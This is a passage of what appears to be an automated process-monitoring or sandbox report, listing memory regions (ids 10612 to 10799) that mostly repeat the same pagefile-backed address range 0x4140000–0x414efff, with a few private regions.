10612 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10613 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10614 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10615 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10616 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10617 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10618 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10619 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10620 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10621 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10622 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10623 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10624 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10625 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10626 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10627 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10628 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10629 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10630 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10631 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10632 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10633 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10634 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10635 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10636 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10637 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10638 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10639 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10640 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10641 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10642 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10643 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10644 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10645 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10646 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10647 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10648 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10649 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10650 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10651 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10652 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10653 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10654 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10655 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10656 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10657 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10658 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10659 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10660 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10661 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10662 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10663 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10664 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10665 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10666 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10667 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10668 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10669 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10670 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10671 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10672 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10673 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10674 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 10675 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 10676 start_va = 0x41d0000 end_va = 0x41defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 10677 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10678 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10679 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10680 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10681 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10682 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10683 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10684 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10685 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10686 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10687 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10688 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10689 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10690 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10691 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10692 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10693 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10694 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10695 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10696 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10697 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10698 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10699 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10700 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10701 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10702 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10703 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10704 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10705 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10706 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10707 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10708 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10709 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10710 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10711 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10712 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10713 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10714 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10715 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10716 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10717 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10718 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10719 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10720 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10721 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10722 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10723 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10724 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10725 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10726 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10727 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10728 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10729 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10730 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10731 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10732 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10733 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10734 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10735 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10736 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10737 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10738 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10739 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10740 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10741 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10742 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10743 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10744 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10745 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10746 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10747 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10748 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10749 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10750 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10751 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10752 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10753 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10754 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10755 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10756 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10757 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10758 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10759 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10760 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10761 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10762 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10763 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10764 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10765 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10766 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10767 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10768 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10769 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10770 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10771 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10772 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10773 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10774 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10775 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10776 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10777 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10778 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10779 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10780 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10781 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 10782 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 10783 start_va = 0x41d0000 end_va = 0x41defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 10784 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10785 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10786 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10787 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10788 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10789 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10790 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10791 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10792 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10793 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10794 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10795 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10796 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10797 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10798 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 10799 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 